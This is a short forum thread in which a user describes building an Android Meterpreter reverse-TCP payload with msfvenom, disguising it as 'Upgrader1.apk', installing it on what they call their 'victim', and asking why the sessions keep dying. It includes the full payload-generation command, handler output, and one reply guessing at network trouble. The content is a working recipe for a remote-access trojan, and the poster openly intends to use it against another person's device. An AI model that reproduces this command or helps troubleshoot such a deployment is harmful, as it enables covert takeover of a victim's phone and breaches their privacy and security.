Forum Thread: Problem with Hacking Android Remotely by Metasploit

Hi
I have created an apk with msfvenom command
msfvenom -p android/meterpreter/reverse_tcp LHOST=(Public IP) LPORT=80 R > /root/Upgrader1.apk
I was successful in installing on android but
* Started reverse TCP handler on (My internal IP):(Opened port)
* Starting the payload handler...
but after sometime the error comes
* Started reverse TCP handler on 192.168.10.3:80
* Starting the payload handler...
* Sending stage (67614 bytes) to 192.168.10.3
* Meterpreter session 1 opened (192.168.10.3:80 -> 192.168.10.3:35548) at 2017-05-20 18:11:42 +0000
* Sending stage (67614 bytes) to 192.168.10.3
* Meterpreter session 2 opened (192.168.10.3:80 -> 192.168.10.3:35550) at 2017-05-20 18:11:43 +0000
* Sending stage (67614 bytes) to 192.168.10.3
* 192.168.10.3 - Meterpreter session 1 closed. Reason: Died
* 192.168.10.3 - Meterpreter session 2 closed. Reason: Died
* 192.168.10.3 - Meterpreter session 3 closed. Reason: Died

With nmap I checked, port 80 was open on my router but not open on My victim.
plz help
How can I open it or I am doing something wrong

1 Response

i think there is network problem or the file you sent is deleted

Share Your Thoughts

  • Hot
  • Active